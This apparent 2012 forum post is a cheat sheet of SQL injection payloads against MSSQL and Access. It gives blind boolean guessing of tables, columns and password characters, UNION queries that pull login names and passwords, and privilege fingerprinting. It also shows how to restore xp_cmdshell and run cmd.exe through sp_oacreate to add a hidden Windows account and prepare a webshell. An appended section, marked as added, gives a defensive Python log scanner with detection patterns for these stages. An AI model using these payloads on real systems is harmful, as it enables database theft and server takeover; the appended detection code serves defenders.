Title: SQL injection statements 2
Author: admin   Time: 2012-9-15 14:32

1. Check whether an injection point exists
and 1=1
and 1=2

2. Guess table names. Typical table names are just admin, adminuser, user, pass, password, etc.
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- checks whether the table admin exists

3. Guess the number of accounts. If 0< returns the normal page and 1< returns the error page, there is exactly one account.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
Column names can also be guessed with: and (select count(column_name) from table_name)>0
4. Guess column names: put the column name you think of inside the parentheses of len( ).
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(name)>0)        (name = the guessed user-name column)
and 1=(select count(*) from admin where len(password)>0)    (password = the guessed password column)

5. Guess the length of each field: keep changing the >0 until the normal page is returned.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)        error
and 1=(select count(*) from admin where len(name)>5)        correct, so the length is 6
and 1=(select count(*) from admin where len(name)=6)        correct

and 1=(select count(*) from admin where len(password)>11)   correct
and 1=(select count(*) from admin where len(password)>12)   error, so the length is 12
and 1=(select count(*) from admin where len(password)=12)   correct
Length can also be guessed with: and (select top 1 len(username) from admin)>5
6. Guess characters
and 1=(select count(*) from admin where left(name,1)=a) --- guesses the first character of the user account
and 1=(select count(*) from admin where left(name,2)=ab) --- guesses the second character of the user account
Keep adding one character at a time; once you have reached the number of characters found in the previous step, the account name is recovered.

Contents can also be guessed with: and (select top 1 asc(mid(password,1,1)) from admin)>50   (works by ASCII code)
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query can also recover Chinese user names and passwords: just replace the trailing number with the Chinese character's ASCII code, and convert the results back to characters at the end.

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )--

UNION SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE column_name NOT IN (login_id)-
UNION SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE column_name NOT IN (login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
Check which service pack the server has (an error means SP4 is installed)
and 1=(select @@VERSION)--

Check the privileges of the database connection account: a normal page proves it holds the sysadmin server role.
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

Determine the database connection account (when connecting as SA, a normal page proves the connection account is SA)
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0<>(select user_name()--

Check whether xp_cmdshell has been deleted
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
If xp_cmdshell has been deleted, restore it (restoring from an absolute path is also supported):
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
Reverse-ping test against your own host
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

Add an account
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--

Create a virtual directory for drive E:
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--

Access properties (used together with writing a webshell):
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

MSSQL can also use a union query
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union works on Access too)
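Added defender-side example, not part of the original post: a small Python scanner that recognises the stages walked through above (probe, count/len/left/asc guessing, fingerprinting, xp_cmdshell restoration, OLE automation, UNION) in web-server log lines, and flags clients whose request volume across the boolean-blind stages betrays a character-by-character walk. The log format, the RFC 5737 addresses and the stage names are assumptions; the queries in the constructed log are the post's own payloads.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# One regex per stage of the walkthrough. Case-insensitive and whitespace-tolerant;
# the dict order is the order in which classify() reports stages.
STAGES = {
    "probe": r"\band\s+1\s*=\s*[12]\b",
    "table-guess": r"select\s+count\(\*\)\s+from\s+\w+",
    "len-guess": r"\blen\s*\(",
    "char-guess": r"\b(left|mid|asc)\s*\(",
    "fingerprint": r"@@version|is_srvrolemember|system_user|user_name\s*\(",
    "xp-cmdshell": r"xp_cmdshell|sp_addextendedproc|sysobjects",
    "ole-automation": r"sp_oacreate|sp_oamethod|wscript\.shell",
    "union": r"\bunion\s+select\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in STAGES.items()}

# Constructed W3C-style log (assumed shape): date time client method path query status.
# Client addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
2012-09-15 14:32:01 192.0.2.10 GET /show.asp id=1+and+1%3D1 200
2012-09-15 14:32:02 192.0.2.10 GET /show.asp id=1+and+1%3D2 500
2012-09-15 14:32:05 192.0.2.10 GET /show.asp id=1+and+0%3C%3E(select+count(*)+from+admin) 200
2012-09-15 14:32:09 192.0.2.10 GET /show.asp id=1+and+1%3D(select+count(*)+from+admin+where+len(name)%3E5) 200
2012-09-15 14:32:20 192.0.2.10 GET /show.asp id=1+and+1%3D(select+top+1+count(*)+from+admin+where+asc(mid(pass,5,1))%3D51)-- 200
2012-09-15 14:32:31 192.0.2.10 GET /show.asp id=1+and+1%3D(SELECT+IS_SRVROLEMEMBER(sysadmin))-- 200
2012-09-15 14:32:40 192.0.2.10 GET /show.asp id=1;EXEC+master.dbo.sp_addextendedproc+xp_cmdshell,xplog70.dll-- 200
2012-09-15 14:33:02 198.51.100.7 GET /show.asp id=42 200
"""

def classify(query: str) -> list[str]:
    """Stages whose signature appears in the URL-decoded query string, in STAGES order."""
    decoded = unquote_plus(query)  # '+' and %XX escapes hide the keywords in raw logs
    return [name for name, rx in COMPILED.items() if rx.search(decoded)]

def scan(log_text: str) -> list[tuple[str, list[str]]]:
    """(client, stages) for every well-formed log line that trips at least one signature."""
    hits = []
    for fields in (line.split() for line in log_text.splitlines()):
        if len(fields) == 7 and (stages := classify(fields[5])):  # skip malformed lines
            hits.append((fields[2], stages))
    return hits

def blind_enum_clients(log_text: str, threshold: int = 3) -> set[str]:
    """Clients with at least `threshold` boolean-blind requests: the len()/left()/asc()
    walk costs one request per guess, so request volume is itself the tell."""
    blind = {"probe", "table-guess", "len-guess", "char-guess"}
    counts = Counter(client for client, stages in scan(log_text) if blind.intersection(stages))
    return {client for client, n in counts.items() if n >= threshold}
```

Each status code in the sample log is also worth correlating: the alternating 200/500 on the `and 1=1` / `and 1=2` pair is exactly the page-difference oracle the post relies on.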